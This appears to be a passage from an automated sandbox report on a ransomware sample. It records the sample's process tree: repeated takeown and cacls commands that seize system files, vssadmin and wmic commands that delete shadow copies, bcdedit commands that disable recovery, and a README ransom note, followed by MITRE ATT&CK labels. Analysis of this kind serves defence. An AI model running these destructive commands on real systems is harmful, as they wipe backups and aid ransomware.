    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm" /E /G Admin:F /C
    3⤵
    PID:5248
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm"
    3⤵
    - Modifies file permissions
    PID:980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "qmgr.jfm" -nobanner
    3⤵
    PID:5316
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "qmgr.jfm" -nobanner
      4⤵
      PID:5512
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5572
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:5600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:5480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    - Modifies file permissions
    PID:5448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "background.png" -nobanner
    3⤵
    PID:5688
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "background.png" -nobanner
      4⤵
      PID:5872
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5576
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl""
  2⤵
  PID:5536
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl" /E /G Admin:F /C
    3⤵
    PID:4764
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl"
    3⤵
    - Modifies file permissions
    PID:5744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner
    3⤵
    PID:5760
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner
      4⤵
      PID:5832
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5808
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs""
  2⤵
  PID:6032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs" /E /G Admin:F /C
    3⤵
    PID:6080
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00001.jrs"
    3⤵
    - Modifies file permissions
    PID:6036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "edbres00001.jrs" -nobanner
    3⤵
    PID:6092
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "edbres00001.jrs" -nobanner
      4⤵
      PID:4728
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""
  2⤵
  PID:5344
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C
    3⤵
    PID:5184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"
    3⤵
    - Modifies file permissions
    PID:5372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
    3⤵
    PID:5456
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
      4⤵
      PID:5708
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5652
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb""
  2⤵
  PID:5532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb" /E /G Admin:F /C
    3⤵
    PID:5752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb"
    3⤵
    - Modifies file permissions
    PID:5772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "vedatamodel.edb" -nobanner
    3⤵
    PID:5792
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "vedatamodel.edb" -nobanner
      4⤵
      PID:5596
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:4376
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:6068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    - Modifies file permissions
    PID:6028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "background.png" -nobanner
    3⤵
    PID:5884
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "background.png" -nobanner
      4⤵
      PID:5880
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5928
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""
  2⤵
  PID:5388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C
    3⤵
    PID:5900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
    3⤵
    - Modifies file permissions
    PID:5336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
    3⤵
    PID:5368
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
      4⤵
      PID:5436
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5668
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:4996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:5508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    - Modifies file permissions
    PID:5236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "device.png" -nobanner
    3⤵
    PID:6140
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "device.png" -nobanner
      4⤵
      PID:5200
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json""
  2⤵
  PID:6064
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json" /E /G Admin:F /C
    3⤵
    PID:5488
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json"
    3⤵
    - Modifies file permissions
    PID:5252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "utc.cert.json" -nobanner
    3⤵
    PID:5804
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "utc.cert.json" -nobanner
      4⤵
      PID:5444
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""
  2⤵
  PID:5264
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C
    3⤵
    PID:6016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"
    3⤵
    - Modifies file permissions
    PID:6048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
    3⤵
    PID:5292
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
      4⤵
      PID:5224
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5540
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:5984
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:5864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    - Modifies file permissions
    PID:6096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:5460
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:6076
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5004
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zmawqXJM.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk""
  2⤵
  PID:3280
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk" /E /G Admin:F /C
    3⤵
    PID:4768
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk"
    3⤵
    - Modifies file permissions
    PID:5432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c e905pXEL.exe -accepteula "edb.chk" -nobanner
    3⤵
    PID:5548
  - - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
      e905pXEL.exe -accepteula "edb.chk" -nobanner
      4⤵
      PID:6116
- - C:\Users\Admin\AppData\Local\Temp\e905pXEL.exe
    e905pXEL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5300

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\fWONOKas.bat"
1⤵
PID:1576
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:4908
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4600
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:3140
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:3148
- C:\Windows\system32\schtasks.exe
  SCHTASKS /Delete /TN DSHCA /F
  2⤵
  PID:2960

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4688

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Public\Desktop\JDPR_README.rtf" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5624

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery